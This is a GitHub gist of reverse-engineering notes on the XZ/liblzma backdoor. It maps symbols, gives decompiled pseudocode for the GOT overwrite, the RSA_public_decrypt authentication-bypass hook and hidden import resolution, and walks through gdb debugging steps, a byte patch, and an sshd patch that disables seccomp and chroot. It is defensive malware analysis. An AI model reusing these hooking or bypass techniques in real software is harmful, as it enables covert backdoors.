Skip to content

Instantly share code, notes, and snippets.

@smx-smx
Last active October 12, 2024 07:23
Show Gist options
  • Save smx-smx/a6112d54777845d389bd7126d6e9f504 to your computer and use it in GitHub Desktop.
Save smx-smx/a6112d54777845d389bd7126d6e9f504 to your computer and use it in GitHub Desktop.
[WIP] XZ Backdoor Analysis and symbol mapping

Discord Room for discussion

https://discord.com/invite/maFYmgQkYH

Github repository:

https://github.com/smx-smx/xzre

Init routines
  • Llzma_delta_props_decoder -> backdoor_ctx_save
  • Llzma_block_param_encoder_0 -> backdoor_init
  • Llzma_delta_props_encoder -> backdoor_init_stage2

  • Llzip_decode_1 -> table1

  • Lcrc64_clmul_1 -> table2

  • Llz_stream_decode -> count_1_bits

  • Lsimple_coder_update_0 -> table_get

    • Retrieves the index of the encoded string given the plaintext string in memory
  • Lcrc_init_0 -> import_lookup

  • .Lcrc64_generic.0 -> import_lookup_ex


Anti RE and x64 code Dasm
  • Llzma_block_buffer_encode_0 -> check_software_breakpoint

  • Lx86_code_part_0 -> code_dasm

  • Llzma_index_iter_rewind_cold -> check_return_address

    • Checks if the return address has been tampered with. This function is called at the beginning of a "protected" function. If the check fails, the function returns early without doing anything

  • Llzma_delta_decoder_init_part_0 -> backdoor_vtbl_init

    • It sets up a vtable with core functions used by the backdoor
  • Lstream_decoder_memconfig_part_1 -> get_lzma_allocator

  • Llzma_simple_props_encode_1 -> j_tls_get_addr

  • Llzma_block_uncomp_encode_0 -> rodata_ptr_offset

  • Llzma12_coder_1 -> global_ctx


ELF parsing
  • Llzma_filter_decoder_is_supported.part.0 -> parse_elf_invoke

  • Lmicrolzma_encoder_init_1 -> parse_elf_init

  • Lget_literal_price_part_0 -> parse_elf

  • Llzma_stream_header_encode_part_0 -> get_ehdr_address

  • Lparse_bcj_0 -> process_elf_seg

  • Llzma_simple_props_size_part_0 -> is_gnu_relro

Stealthy ELF magic verification
  // locate elf header
  while ( 1 )
  {
    if ( (unsigned int)table_get(ehdr, 0LL) == STR__ELF ) // 0x300
      break; // found
    ehdr -= 64; // backtrack and try again
    if ( ehdr == start_pointer )
      goto not_found;
  }

  • Llzma_stream_flags_compare_1 -> get_rodata_ptr

Verified or Suspected function hooking
  • Llzma_index_memusage_0 -> apply_entries

  • Llzma_check_init_part_0 -> apply_one_entry

  • Lrc_read_init_part_0 -> apply_one_entry_internal

  • Llzma_lzma_optimum_fast_0 -> install_entries

  • Llzip_decoder_memconfig_part_0 -> installed_func_0

  • Llzma_index_prealloc_0 -> RSA_public_decrypt GOT hook/detour

  • Llzma_index_stream_size_1 -> check_special_rsa_key -> (thanks q3k)

    • Called from Llzma_index_prealloc_0, it checks if the supplied RSA key is the special key to bypass the normal authentication flow
  • Lindex_decode_1 -> installed_func_2

  • Lindex_encode_1 -> installed_func_3

  • Llzma2_decoder_end_1 -> apply_one_entry_ex

  • Llzma2_encoder_init.1 -> apply_method_1

  • Llzma_memlimit_get_1 -> apply_method_2


lzma allocator / call hiding

  • Lstream_decoder_mt_end_0 -> get_lzma_allocator_addr
  • Linit_pric_table_part_1 -> fake_lzma_allocator
  • Lstream_decode_1 -> fake_lzma_free

core functionality
  • Llzma_delta_props_encode_part_0 -> resolve_imports (including system())

  • Llzma_index_stream_flags_0 -> process_shared_libraries

    • Reads the list of loaded libraries through _r_debug->r_map, and calls process_shared_libraries_map to traverse it
  • Llzma_index_encoder_init_1 -> process_shared_libraries_map

    • Traverses the list of loaded libraries, looking for specific libraries
  • func @0x7620 : It does indirect calls on the vtable configured by backdoor_vtbl_init, and is called by the RSA_public_decrypt hook (func#1) upon certain conditions are met

Software Breakpoint check, method 1

This method checks if the instruction endbr64, which is always present at the beginning of every function in the malware, is overwritten. GDB would typically do this when inserting a software breakpoint

/*** address: 0xAB0 ***/
__int64 check_software_breakpoint(_DWORD *code_addr, __int64 a2, int a3)
{
  unsigned int v4;

  v4 = 0;
  // [for a3=0xe230], true when *v = 0xfa1e0ff3 (aka endbr64)
  if ( a2 - code_addr > 3 )
    return *code_addr + (a3 | 0x5E20000) == 0xF223;// 5E2E230
  return v4;
}

Function backdoor_init (0xA784)

__int64 backdoor_init(rootkit_ctx *ctx, DWORD *prev_got_ptr)
{
  _DWORD *v2;
  __int64 runtime_offset;
  bool is_cpuid_got_zero;
  void *cpuid_got_ptr;
  __int64 got_value;
  _QWORD *cpuid_got_ptr_1;

  ctx->self = ctx;
  // store data before overwrite
  backdoor_ctx_save(ctx);
  ctx->prev_got_ptr = ctx->got_ptr;
  runtime_offset = ctx->head - ctx->self;
  ctx->runtime_offset = runtime_offset;
  is_cpuid_got_zero = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset == 0LL;
  cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 1) + runtime_offset;
  ctx->got_ptr = cpuid_got_ptr;
  if ( !is_cpuid_got_zero )
  {
    cpuid_got_ptr_1 = cpuid_got_ptr;
    got_value = *(QWORD *)cpuid_got_ptr;
    // replace with Llzma_delta_props_encoder (backdoor_init_stage2)
    *(QWORD *)cpuid_got_ptr = (char *)*(&Llzma_block_buffer_decode_0 + 2) + runtime_offset;
    // this calls Llzma_delta_props_encoder due to the GOT overwrite
    runtime_offset = cpuid((unsigned int)ctx, prev_got_ptr, cpuid_got_ptr, &Llzma_block_buffer_decode_0, v2);
    // restore original
    *cpuid_got_ptr_1 = got_value;
  }
  return runtime_offset;
}

Function Name matching (function 0x28C0)
str_id = table_get(a6, 0LL);
...
if ( str_id == STR_RSA_public_decrypt_ && v11 )
...
else if ( v13 && str_id == STR_EVP_PKEY_set__RSA_ )
...
else if (str_id != STR_RSA_get__key_ || !v17 )
Hidden calls (via lzma_alloc)

lzma_alloc has the following prototype:

extern void * lzma_alloc (size_t size , const lzma_allocator * allocator )

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

void *get_lzma_allocator()
{
  return get_lzma_allocator_addr() + 8;
}

char *get_lzma_allocator_addr()
{
  unsigned int i;
  char *mem;

  // Llookup_filter_part_0 holds the relative offset of `_Ldecoder_1` - 180h (0xC930)
  // by adding 0x180, it gets to 0xCAB0 (Lx86_coder_destroy), Since the caller adds +8, we get to 0xCAB8, which is the lzma_allocator itself
  mem = (char *)Llookup_filter_part_0;
  for ( i = 0; i <= 0xB; ++i )
    mem += 32;
  return mem;
}

The interface for lzma_allocator can be viewed for example here: https://github.com/frida/xz/blob/e70f5800ab5001c9509d374dbf3e7e6b866c43fe/src/liblzma/api/lzma/base.h#L378-L440

Therefore, the allocator is Linit_pric_table_part_1 and free is Lstream_decode_1

  • NOTE: the function used for alloc is very likely import_lookup_ex, which turns lzma_alloc into an import resolution function. this is used a lot in resolve_imports, e.g.:
                  system_func = lzma_alloc(STR_system_, lzma_allocator);
                ctx->system = system_func;
                if ( system_func )
                  ++ctx->num_imports;
                shutdown_func = lzma_alloc(STR_shutdown_, lzma_allocator);
                ctx->shutdown = shutdown_func;
                if ( shutdown_func )
                  ++ctx->num_imports;

The third lzma_allocator field, opaque, is abused to pass information about the loaded ELF file to the "fake allocator" function. This is highlighted quite well by function Llzma_index_buffer_encode_0:

__int64 Llzma_index_buffer_encode_0(Elf64_Ehdr **p_elf, struct_elf_info *elf_info, struct_ctx *ctx)
{
  _QWORD *lzma_allocator;
  __int64 result;
  __int64 fn_read;
  __int64 fn_errno_location;

  lzma_allocator = get_lzma_allocator();
  result = parse_elf(*p_elf, elf_info);         // reads elf into elf_info
  if ( (_DWORD)result )
  {
    lzma_allocator[2] = elf_info;               // set opaque field to the parsed elf info
    fn_read = lzma_alloc(STR_read_, lzma_allocator);
    ctx->fn_read = fn_read;
    if ( fn_read )
      ++ctx->num_imports;
    fn_errno_location = lzma_alloc(STR___errno_location_, lzma_allocator);
    ctx->fn_errno_location = fn_errno_location;
    if ( fn_errno_location )
      ++ctx->num_imports;
    return ctx->num_imports == 2; // true if we found both imports
  }
  return result;
}

Note how, instead of size, the malware passes an EncodedStringID instead

Dynamic analysis

Analyzing the initialization routine

  1. Replace the endbr64 in get_cpuid with a jmp . ("\xeb\xfe")
root@debian:~# cat /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 > liblzma.so.5.6.1
root@debian:~# perl -pe 's/\xF3\x0F\x1E\xFA\x55\x48\x89\xF5\x4C\x89\xCE/\xEB\xFE\x90\x90\x55\x48\x89\xF5\x4C\x89\xCE/g' -i liblzma.so.5.6.1
  1. Force sshd to use the modified library with LD_PRELOAD
# env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h

NOTE: anarazel recommends using LD_LIBRARY_PATH with a symlink instead, since LD_PRELOAD changes the initialization order and could interfere with the normal flow of the malware

2b. or use this gdbinit file to do it all at once

# cat gdbinit
set confirm off
unset env

## comment this out if you don't want to debug the initialization code
## (or use LD_LIBRARY_PATH instead)
set env LD_PRELOAD=/root/sshd/liblzma.so.5.6.1
set env LANG=C
file /usr/sbin/sshd
## start sshd on port 2022
set args -p 2022
set disassembly-flavor intel
set confirm on
set startup-with-shell off

show env
show args

# gdb -x gdbinit
(gdb) r
Starting program: /usr/sbin/sshd -p 222
^C <-- send CTRL-C
Program received signal SIGINT, Interrupt.
0x00007ffff7f8a7f0 in ?? ()
  1. Attach to the frozen process with your favourite debugger (gdb attach pid)
(gdb) bt
#0  0x00007f8cb3b067f0 in ?? () from /root/sshd/liblzma.so.5.6.1
#1  0x00007f8cb3b08c29 in lzma_crc32 () from /root/sshd/liblzma.so.5.6.1
#2  0x00007f8cb3b4ffab in elf_machine_rela (skip_ifunc=<optimized out>,
    reloc_addr_arg=0x7f8cb3b3dda0 <lzma_crc32@got[plt]>,
    version=<optimized out>, sym=0x7f8cb3b03018, reloc=0x7f8cb3b04fc8,
    scope=0x7f8cb3b3f4f8, map=0x7f8cb3b3f170)
    at ../sysdeps/x86_64/dl-machine.h:300
#3  elf_dynamic_do_Rela (skip_ifunc=<optimized out>, lazy=<optimized out>,
    nrelative=<optimized out>, relsize=<optimized out>,
    reladdr=<optimized out>, scope=<optimized out>, map=0x7f8cb3b3f170)
    at ./elf/do-rel.h:147
#4  _dl_relocate_object (l=l@entry=0x7f8cb3b3f170, scope=<optimized out>,
    reloc_mode=<optimized out>, consider_profiling=<optimized out>,
    consider_profiling@entry=0) at ./elf/dl-reloc.c:301
#5  0x00007f8cb3b5e6e9 in dl_main (phdr=<optimized out>, phnum=<optimized out>,
    user_entry=<optimized out>, auxv=<optimized out>) at ./elf/rtld.c:2318
#6  0x00007f8cb3b5af0f in _dl_sysdep_start (
    start_argptr=start_argptr@entry=0x7ffe17e402e0,
    dl_main=dl_main@entry=0x7f8cb3b5c900 <dl_main>)
    at ../sysdeps/unix/sysv/linux/dl-sysdep.c:140
#7  0x00007f8cb3b5c60c in _dl_start_final (arg=0x7ffe17e402e0)
    at ./elf/rtld.c:498
#8  _dl_start (arg=0x7ffe17e402e0) at ./elf/rtld.c:585
#9  0x00007f8cb3b5b4d8 in _start () from /lib64/ld-li
nux-x86-64.so.2
#10 0x0000000000000002 in ?? ()
#11 0x00007ffe17e40fa1 in ?? ()
#12 0x00007ffe17e40fb0 in ?? ()
#13 0x0000000000000000 in ?? ()

NOTE: _get_cpuid will call function 0xA710, whose purpose is to detect if we're at the right point to initialize the backdoor Why? Because elf_machine_rela will call _get_cpuid for both lzma_crc32 and lzma_crc64. Since the modified code is part of lzma_crc64, 0xA710 has a simple call counter in it to trace how many times it has been called, and make sure the modification doesn't trigger for lzma_crc32.

  • first call (0): -> lzma_crc32
  • second call (1): -> lzma_crc64
  if ( call_counter == 1 )
  {
    /** NOTE: some of these fields are unverified and guessed **/
    rootkit_ctx.head = 1LL;
    memset(&rootkit_ctx.runtime_offset, 0, 32);
    rootkit_ctx.prev_got_ptr = prev_got_ptr;
    backdoor_init(&rootkit_ctx, prev_got_ptr);  // replace cpuid got entry
  }
  ++call_counter;
  cpuid(a1, &v5, &v6, &v7, &rootkit_ctx);
  return v5;
}

At this point, you can issue detach and attach with other debuggers if needed.

Once attached, set relevant breakpoints and restore the original bytes ("\xF3\x0F\x1E\xFA")

breakpoint on RSA_public_decrypt hook

Run this gdb script on the sshd listener process (this new gdbinit script should account for eventual differences in library load address - it didn't happen for me in the first tests but it did later on)

set pagination off
set follow-fork-mode child
catch load
# now we forked, wait for lzma
catch load liblzma
c
# now we have lzma
# 0x12750: offset from base
hbreak *(lzma_crc32 - 0x2640 + 0x12750)
set disassembly-flavor intel
set pagination on
c

Now connect via https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4

...
Thread 3.1 "sshd" hit Breakpoint 1, 0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5
(gdb) bt
#0  0x00007ffff73d1d00 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5
#1  0x00007ffff73d1ae7 in ?? () from /lib/x86_64-linux-gnu/liblzma.so.5 <-- Llzma_index_prealloc_0 (offset 0x48 in vtable)
#2  0x00005555556bdd00 in ?? ()
#3  0x0000000100000004 in ?? ()
#4  0x00007fffffffdeb0 in ?? ()
#5  0x00000001f74b5d7a in ?? ()
#6  0x0000000000000000 in ?? ()
RSA_public_decrypt GOT hook (Llzma_index_prealloc_0)
  /** the following happens during pubkey login **/
  
  params[0] = 1;                                // should we call original?
  // this call checks if the supplied RSA key is special
  result = installed_func_1(rsa_key, global_ctx, params); 
  // if still 1, the payload didn't trigger, call the original function
  // if 0, bypass validation
  if ( params[0] ) 
    return real_RSA_public_decrypt(flen, from, to, rsa_key);
  return result;

Binary patch for sshd to disable seccomp and chroot (allows Frida tracing of [net] processes)

> fc /b sshd sshd_patched
Comparing files sshd sshd_patched
0001332A: 75 90 
0001332B: 6D 90
----
0004FC24: 41 C3
0004FC25: 54 90
----
00109010: 01 00
XZ Backdoor symbol deobfuscation. Updated as i make progress
@fkirc
Copy link

fkirc commented Apr 2, 2024

Thank you for your analysis.
I have a question regarding the write-execute memory protection:

I understand that xz was mapped into the address-space of sshd. However, I still don’t understand how it is possible to overwrite a function of sshd.
Until now, I thought that all modern Linux-systems are enforcing a write-xor-execute policy: https://en.m.wikipedia.org/wiki/W%5EX
This means that every page of memory could be writable or executable, but not both at the same time.

So how on earth it is possible that some malicious library is overwriting code of sshd?
I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

@PluMGMK
Copy link

PluMGMK commented Apr 2, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

@anarazel
Copy link

anarazel commented Apr 2, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

It doesn't even overwrite them during the ifunc resolution itself - it can't, because when liblzma is loaded the main binary isn't yet mapped. And they wanted to redirect the main binary's use of RSA_public_decrypt, and the GOT for that is mapped alongside the main binary. That's why they install the dl-audit hook, it gets called later when the relocations in the main binary are being processed.

@fkirc
Copy link

fkirc commented Apr 3, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

It doesn't even overwrite them during the ifunc resolution itself - it can't, because when liblzma is loaded the main binary isn't yet mapped. And they wanted to redirect the main binary's use of RSA_public_decrypt, and the GOT for that is mapped alongside the main binary. That's why they install the dl-audit hook, it gets called later when the relocations in the main binary are being processed.

Can you elaborate more about what is a “dl-audit hook“ and how is it possible to overwrite function pointers in the GOT?
How does it even find the GOT of sshd if ASLR is enabled?
I thought that every library has its own GOT and doesn’t know where the GOTs of other libraries are located in the virtual memory?

@step21
Copy link

step21 commented Apr 3, 2024

AFAIK pointers are not ‘overwritten’. This ifunc resolution is ordinarily used to select different functions f e based on the architecture it is run on. So this is a glibc functionality and it doesn’t need to disable aslr or similar.

@Xiphoseer
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment